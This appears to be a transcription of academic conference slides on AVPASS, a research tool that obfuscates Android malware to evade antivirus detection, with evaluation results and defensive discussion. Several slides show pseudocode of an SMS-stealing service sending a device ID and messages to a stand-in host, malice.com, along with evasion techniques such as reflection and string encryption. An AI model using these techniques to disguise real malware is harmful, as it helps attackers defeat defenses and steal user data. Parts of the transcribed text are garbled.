Transcription

AVPASS: Automatically BypassingAndroid Malware Detection SystemJinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo KimGeorgia Institute of Technology, July 27, 2017

About UsSSLab (@GT) Focusing on system and security research https://sslab.gtisc.gatech.edu/ISTC-ARSA Intel Science & Technology Center for Adversary-Resilient Security Analytics Strengthening the analytics behind malware detection ia-tech/2

In This Talk, We Will Introduce AVPASSTransform any Android malware to bypass AVs By inferring AV features and rules By obfuscating Android binary (APK) Yet supports preventing code leakage3

Trend: Android Dominates Mobile OS MarketAndroid still leads mobile marketRegained share over iOS to achieve an 86 percent ww.gartner.com/newsroom/id/34151174

Problem: Android Malware Becomes More Prevalent8,400 new Android malware everydaySecurity experts expect around3.5 million new Android malware apps for 12-8-400-new-android-malware-samples-every-day5

One solution: Protecting Mobile Devices with Anti-VirusThere are over 50 Android anti-virus software in devices/6

Unfortunately, AV Solutions Known to be Weak(example: JAVA malware)* Developing Managed Code Rootkits for the Java Runtime Environment, Benjamin Holland, DEFCON 247

What About Android Malware?Malware!Malware8

What About Android Malware?How easy it to bypass AV software?Malware!MalwareBenign App9

Challenges: Bypassing Unknown AV Solutions① Transforming without destroying malicious featuresMalware!Malware② No pre-knowledge of AV featuresBenign App③ Interact without leaking own malicious features10

Approaches: Automatically Inferring andObfuscating Detection FeaturesObfuscating individual featuresInferring features and detection rules of AVsBypass AVs by using inferred features and rules Yet minimize information leaking by sending fake malware11

Summary of AVPASS operationBypassed most of AVs with 3.42 / 58 (5.8%) detectionsDiscovered 5 strong, 3 normal, and 2 weak impact features of AVsDiscovered bypassing rule combinations (about 30%)Prevented code leakage when querying by using Imitation Mode12

AVPASS Overview and Workflow① Binary ObfuscationMalware② InferringFeatures & RulesDisguised & Bypass③ Query Safely13

What is Binary Obfuscation?MethodAPIStringVariablePayload PackageInteractionData-flowResource ClassEncrypt & Remove FeaturesObfuscationI Look different,but maintainsame behaviorsObfuscated Application14

Main Obfuscation FeaturesNumberObfuscation PrimitivesSide-Effects1Component interaction injectionN/A2Dataflow analysis avoiding code injectionN/A3String encryptionN/A4Variable name encryptionN/A5Package name encryptionN/A6Method and Class name encryptionN/A7Dummy API and benign class injectionN/A8Bytecode injectionN/A9Java reflection transformationN/A10Resource encryption (xml and image)Appearance15

APK Obfuscation RequirementsEnsure APK’s original functionalities Error-free “smali” code injection* Disassembled code of DEX formatShould be difficult to de-obfuscate or reverse Increase obfuscation complexitiesE.g., Hide all APIs by using Java reflectionE.g., Encrypt all Strings with different encryption keysE.g., Apply obfuscation multiple times16

Easy Problem: Available Number of Registers.method public DoSomething().locals 5 ( 1).method public DoSomething().locals 4# register: v0 – v3 used hereTryInjection# register: v1 – v4 used here# code injection using v0.end method.end methodv0v1v2v3v0v1v2v3v4Increase maximum number and shift all registers and parameters17

Tricky Problem: Limited Number of Registers.method public DoSomething(p0 p9).locals 4Total: 14# register: v0 – v3 used here# parameter: p0 – p9 used here.method public DoSomething(p0 p9).locals 7 ( 3)TryInjection# register: v0 – v3 used here# parameter: p0 – p9 used here# instruction using p10 (v16).end methodTotal: 17Inst. RangeError ( v15).end methodv0v1v2v3v4v5 v13p0p1p9v0v1v2 v6v7v8 v16p0p1p918

Solution: Backup and Restore Before Injection.method public DoSomething(p0 p9).locals 7 ( 3).method public DoSomething(p0 p9).locals 4# register: v0 – v3 used here# parameter: p0 – p9 used hereTryInjection# register: v0 – v3 used here# parameter: p0 – p9 used here① backup register v3 – v12② code injection using v0 – v2③ restore register v3 – v12.end method.end methodv0v1v2v3v4v5 v13v0p0p1p9v1v2v3backup v12v13 v23restoreWhy tricky? AVPASS needs to trace type of each register when backup/restore19

Difficult to Reverse as RequirementToo Easy to Detect Obfuscation?True, but it doesn’t help AVs much How could you tell benign or malicious?Dynamic analysis can detect original behavior However, code coverage is another challengeNot that practical due to overhead20

Example: Difficult to Reversepublic class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();String output ID.concat(SMSmsg);URL url new URL(http://malice.com);url.sendData(output);}}21

Example: Difficult to Reversepublic class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);Reflection1TelephonyMgr tm new TelephonyMgr();Reflection2String ID tm.getDeviceID();Reflection3}}Reflection4String output ID.concat(SMSmsg);URL url new URL(http://malice.com);String Enc1url.sendData(output);Reflection5Reflection Wrapper1classnamemethodnameReflection snamemethodnameclassnamemethodnameString Encryptor1Encrypted MSGDecryption KEYReflection Wrapper2Reflection Wrapper3Reflection Wrapper422

Example: Difficult to Reversepublic class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);Reflection1TelephonyMgr tm new TelephonyMgr();Reflection2String ID tm.getDeviceID();Reflection3}}Reflection4String output ID.concat(SMSmsg);URL url new URL(http://malice.com);String Enc1url.sendData(output);Reflection5Reflection Wrapper1Reflection Wrapper2Reflection Wrapper3Reflection Wrapper4Reflection Wrapper5String Encryptor1String Enc2classnamemethodnameString Enc3String Enc4classnamemethodnameString Enc5String Enc6classnamemethodnameString Enc7classnameString Enc8methodnameString Enc9classnameString Enc10methodnameString Enc11String Enc12EncryptedMSGDecryptionString Enc13KEY23

Example: Difficult to ReverseString Enc14public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);Reflection1TelephonyMgr tm new TelephonyMgr();Reflection2String ID tm.getDeviceID();Reflection3}}Reflection4String output ID.concat(SMSmsg);URL url new URL(http://malice.com);String Enc1url.sendData(output);Reflection5Reflection Wrapper1Reflection Wrapper2Reflection Wrapper3Reflection Wrapper4Reflection Wrapper5String Encryptor1String Enc2classnamemethodnameString Enc3String Enc4classnamemethodnameString Enc5String Enc6classnamemethodnameString Enc7classnameString Enc8methodnameString Enc9classnameString Enc10methodnameString Enc11String Enc12EncryptedMSGDecryptionString Enc13KEYString Enc15EncString Enc NString Enc N 1String Enc N 2String Enc N 3String Enc N 4String Enc N 5Yes, you can tell obfuscation here but difficult to reverse24

Start with Well-known Detection TechniquesAPI-based detectionDataflow-based detectionInteraction-based detectionSignature-based detection25

Android Malware ExampleSMS Leaking MalwareComponent: InterceptSMSComponent: SendToNetworkSMS receivedLeaked InformationSMS intercepted bybackground ServiceHacker sends interceptedmessage to malice.com26

API-based Android Malware DetectionComponent: InterceptSMSComponent: SendToNetworkpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);}}}}String output ID.concat(“SMSmsg”);URL url new iousAPI sequence(n-gram)27

Dataflow-based Android Malware DetectionComponent: InterceptSMSComponent: SendToNetworkpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);}}TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID(); Suspicious SourceString output ID.concat(SMSmsg);URL url new cious Sink}SuspiciousDataflow28

Interaction-based Android Malware DetectionComponent: InterceptSMSComponent: SendToNetworkpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();SuspiciousInteractionString output ID.concat(SMSmsg);URL url new URL(http://malice.com);url.sendData(output);}}}}29

Signature-based Android Malware DetectionComponent: InterceptSMSComponent: SendToNetworkpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);String output ID.concat(SMSmsg);URL url new gnatures: Class, Variable, String, Package, and etc30

Bypassing API-based Detection SystemBreak frequency analysis Massive API insertion to change number of APIsBreak n-gram (sequence) analysis Insert dummy API between existing APIsBreak APIs transition ratio analysis Transition ratio? java android, java.lang android.util 1) Insert massive APIs or 2) Change package names31

Bypassing API-based Detection System (1/2)Break n-gram analysisGetDeviceID() concat() sendData()public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();Android.text.format.DateFormat() // DUMMYString output ID.concat(SMSmsg);Android.text.format.DateFormat() // DUMMYURL url new iceID() DateFormat() concat() DateFormat() sendData()}}32

Bypassing API-based Detection System (2/2)Break transition ratio analysisuser-defined() java.lang(String) user-defined()public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);userDefined1 tm new TelephonyMgr();String ID tm.getDeviceID();String output ID.concat(SMSmsg);userDefined2 url new t);java.util.user-defined() java.lang(String) java.util.user-defined()}}33

Bypassing Dataflow-based Detection System (1/2)Explicit Implicit dataflowpublic class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();Implicit FlowSMSmsg ID output (tracked)untrackedStr anti-dataflow-analysis-code(ID)String output untrackedStr.concat(SMSmsg);URL url new URL(http://malice.com);url.sendData(output);SMSmsg untrackedStr output (untracked)}}34

Bypassing Dataflow-based Detection System (2/2)Java Reflection (API name hiding)public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();Nothingto TraceString ID ReflectionWrapper1();Unable to track suspicious source APIString output ID.concat(SMSmsg);URL url new URL(http://malice.com);url.sendData(output);}}35

Bypassing Interaction-based Detection SystemComponent: SendToNetworkComponent: InterceptSMSpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();SuspiciousInteractionString output ID.concat(SMSmsg);URL url new URL(http://malice.com);url.sendData(output);}}}}36

Bypassing Interaction-based Detection SystemComponent: InterceptSMSComponent: SendToNetworkpublic class InterceptSMS (BroadcastReceiver) {public void onReceive( ) {SmsMessage msg SmsMessage.create();String SMS msg.getMessageBody();public class SendToNetwork (Service) {public void onStartCommand( Intent ) {String SMSmsg intent.get(“sms”);TelephonyMgr tm new TelephonyMgr();String ID tm.getDeviceID();#1Intent si new Intent(Malicious.class);si.putExtra(“sms”, SMS);startService(si);}String output ID.concat(SMSmsg);URL url new vide components and make new relation to nullify the analysis37

Evaluation: BypassingWell-known Detection SystemAPI-based Detection (Ratio-based)CategoryAPI transitionratio detectionStrategyBypass RatioInject dummy APIs to make diff. ratio(up to 2,000 insertions)80%Modify all family/package names95%38

Evaluation: BypassingWell-known Detection SystemAPI-based Detection (Ratio-based)CategoryAPI transitionratio detection* If malware size if big, you shouldinject much more APISStrategyBypass RatioInject dummy APIs to make diff. ratio(up to 2,000 insertions)80%Modify all family/package names95%39

Evaluation: BypassingWell-known Detection SystemDataflow-based DetectionCategoryStrategyBypass Ratio34%Dataflow trackingInject anti-dataflow-analysis code(support: String and Cursor datatype)Hide API name by using reflection100%Interaction-based Detection Successfully disguised 100% of malware40

Evaluation: BypassingWell-known Detection SystemDataflow-based Detection* As you can see, success ratio is low.Anti-dataflow-analysis code is difficultto make and easy to be detected.CategoryStrategyBypass Ratio34%Dataflow trackingInject anti-dataflow-analysis code(support: String and Cursor datatype)Hide API name by using reflection100%Interaction-based Detection Successfully disguised 100% of malware41

Demo #1Bypass API-based detection systemBypass Dataflow-based detection systemBypass Interaction-based detection system42

Let’s move on to real world detection system43

New Target: Real World Unknown AVsTarget: VirusTotal* Aggregation of many antivirus products andonline scan engines to check for virusesQuestions Which features are important?Which combinations affect to result?Which classifier they are using?Are they robust enough to detect variation?44

Strategy : How to Infer and Bypass AVs?Inferring each feature’s impact Obfuscate individual feature and then queryInferring detection rules Generate all possible variations and then queryReduce the number of query Group similar / relevant obfuscationsProvide way to query safely Query by using fake (but similar) malware45

Inferring Feature: What AVs are Looking at?Process for eliminating unnecessary obfuscationWe need to “guess” possible features Byte stream? hash of image? IDs in resource? API and its arguments?How? Obfuscate individual feature and analyze result46

Finding : Inferred FeaturesNumberObfuscation PrimitivesImpact Observed1Component interaction injectionNo2Dataflow analysis avoiding code injectionNo3String encryptionStrong4Variable name encryptionNormal5Package name encryptionStrong6Method and class name encryptionStrong7Dummy API and benign class injectionNormal8Bytecode injectionWeak9Resource encryption (xml and image)Weak10Dropper payload (jar or APK)Strong11PermissionsNormal12APIs name hidingStrong47

Inferring Rules:Finding Feature Combinations to BypassProcess for finding detection rules / logic insideWhy infer? To bypass with minimum obfuscations To generate disguised malware with essential obfuscationsHow? Obfuscate features and query variations48

2k Factorial Experiment Design* with k factor (features) decide 1) maintain kth factor or 2) obfuscate kth factorObfuscation group (example)O1O2O3O4O5O6O7StringVariablePackageClass API injectionResource Dropper removalPermissionremovalAPIhiding2k variations (27 128)O1O2O3O4O5O6O7O1O2O3O4O5O6O7 O1O2O3O4O5O6O7Test with 100 malware? 100 x 128 x 2 way 25,600 queries49

2k Factorial Experiment DesignE.g., Test “string package resource” combinationO1O2O3O4O5O6O7E.g., Test “order” to know impact of features (1 3 7 6 )50

Inferred Rules: Must-do Obfuscations to BypassAnti-virus (T): Weak ti-virus (K): Strong detection#STRVARPACKCLASS/INJRESPERMV1V2VVVVVVV: bypassed when obfuscated these features* Experiment in May/2017, Test with 130 malware and 16,000 variationsAPI3V4V5V6VVVVV 12VV13V14V15VV16VV17VV18VVVVVV51

Observation About Inferred RulesMost AVs use all (7 group) features when detectInferred rules are about 30% of all possible combinationsBetter AVs have more complicated rules52

How to Query Safely?Should minimize the sending informationShould not send real code, instead send similar oneDon’t worry about the APK’s functionality when querying53

Imitation ModeImitation Mode: mimicking malware when queryBenefit of imitationEmpty Application template Generate malware with selected featuresQuery without entire codeImitation #1O1MalwareO1O2O3O4O5O6O7O2BENIGNImitation #2O1O3MALICIOUS54

Putting it All TogetherMalware development scenario with AVPASS① Binary rewriting obfuscationsDisguised & BypassMalware② Imitation ModeINFERREDFEATURES &RULES③ Developermodification55

Evaluation: Bypassing AVsGeneral bypass abilityCategoryAvg. DetectionsDetection RatioAverage Detections38 / 5865%After AVPASS3.42 / 585.8%* Experiment in July / 2017, Test with 2,000 malwareImportant features when bypassing or being detected To bypass : API Package name Class name To be detected : String API Package name 56

Evaluation: Bypassing AVsObfuscation vs. Inferred rule combinationsCategoryAvg. DetectionsRatioFull Obfuscations8 / 5813%Inferred rules (about 30%)10 / 5817%* Experiment in May / 2017, Test with 130 malware and 16,000 variationsImitation Mode detectionCategoryAvg. DetectionsFull Obfuscation8 / 58Imitation mode detected(2 - 7 features combination)6.2 / 58* Experiment in May / 2017, Test with 100 malware and 12,000 variations57

Why not 100% Bypass?Obfuscation cannot modify some contents [Ex1] Permission: uses-permissions and android:permission [Ex2] Intent-filter: action, category, data, and etcAVPASS might miss possible features that AV usesHowever, Imitation Mode will tell you about detection58

Findings: Observed Behaviors of AVsStatic vs. Dynamic analysis-based detection No dynamic analysis-based detection was found(because AVs should yield results within minutes thru VirusTotal)AVs mainly detect by pattern matching Lack of advanced techniques (e.g., dataflow or interaction analysis)50% of AVs only use hash valueAhnlab1) / WhiteArmor2) showed best detections (May, ’17)After Java Reflec. QuickHeal3) / WhiteArmor best (July, ’17)1) http://www.ahnlab.com2) http://www.whitearmor.ai3) http://www.quickheal.co.in/59

Feedback from AVs companies(How could you detect well?)AhnlabNo responseWhiteArmorOur detection uses composite models. Sorry for the limited informationI can give you. As you know, the enemy is in the dark.QuickHealNo response60

Demo #2Infer features and rules of AVsBypass AVsSafe query by using imitation mode61

Discussion: Which AVs are Difficult to Bypass?Thorough analysis and pattern matching Stronger AVs check more features and signaturesComplex rule combinations In general, good AVs have more detection rules Detection ratio vs. False positiveDataflow-based and Interaction-based detection AVPASS can bypass but our pattern is too obvious Difficult to re-develop anti-analysis code62

Discussion: AVPASS vs. De-obfuscationResearch on detection of obfuscated malwareDe-obfuscation technique Dynamic analysis based Probabilistic analysis basedDeGuard test result Recover 70% of class names(when /wo AVPASS’s reflection) Cannot recover other obfuscationshttp://apk-deguard.com/63

Discussion: Defensive MeasuresAdditional category of return value Introduce “NOT VALID” outputIncrease the number of features for detection Prevent model inferring by imitation modeActive intervention of middle-man Detect inferring behavior and impose penalty64

Discussion: AVPASS LimitationsMalware with payload (e.g., apk/elf dropper or Native Libs) Put everything within class not external file AVPASS will handleAVPASS as a malicious pattern (after open-source) Name encryption: generic, difficult to detect Code insertion: could be a malicious signature, difficult to re-developDynamic analysis Can resolve some obfuscations: encrypted string, dummy API, 65

Discussion: AVPASS LimitationsMalware with payload (e.g., apk/elf dropper or Native Libs) Develop within your code(class) not external file AVPASS will handleAVPASS as a malicious pattern (after open-source) Name encryption: generic, difficult to detect Code insertion: could be a malicious signature, difficult to re-developDynamic analysis Can resolve some obfuscations: encrypted string, dummy API, Detected “HelloWorld” (template name) asMalicious after 15 20K queries (20170517)Now AV companies share signatures (20170719)66

Discussion: AVPASS LimitationsMalware with payload (e.g., apk/elf dropper or native libs) Develop within your code(class) not external file AVPASS will handleAVPASS as a malicious pattern (after open-source) Name encryption: generic, difficult to detect Code insertion: could be a malicious signature, difficult to re-developDynamic analysis Can resolve some obfuscations: encrypted string, dummy API, 67

Actually, We are Conducing Two ResearchesSeparate research into “Attack” and “Defense” AVPASS: “How to bypass?” DEFENSE: “How to detect malware variations?”Intel labs developed Android malware detection platform Incorporate both Static and Dynamic analysis Emulation-based analysis reveals some of obfuscations68

Intel Android Malware Detection Platform* Upload and select classifierSign upUpload APK* Check classified result and emulated 9

Future WorkMore sophisticated obfuscation and more test More feature discovery, increase success ratio, Test on Google Verify Apps, independent AV solution, Incremental improvement of bypassing ability By conducting separated researchWindows version of AVPASS Robust binary rewriting technique is required Inferring detection rules on more advanced AVs70

AVPASS is Available NowSource code https://github.com/sslab-gatech/avpassIntel Android malware analysis platform Send mail to [email protected], then we will let you inContact point AVPASS: Jinho Jung ([email protected]) Malware Analysis System: Mingwei Zhang ([email protected])71

ConclusionBypassed most of AVs and found limitations (cannot bypass all)Discovered features and rule combinations of AVsProposed Imitation Mode to prevent code leakageProvided AVPASS as open-source72

Android Malware Detection System Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim . ("sms"); TelephonyMgrtm newTelephonyMgr(); . Encrypted MSG Decryption KEY String Enc2 String Enc3 String Enc4 String Enc5 String Enc6 String Enc7 String Enc8 String Enc9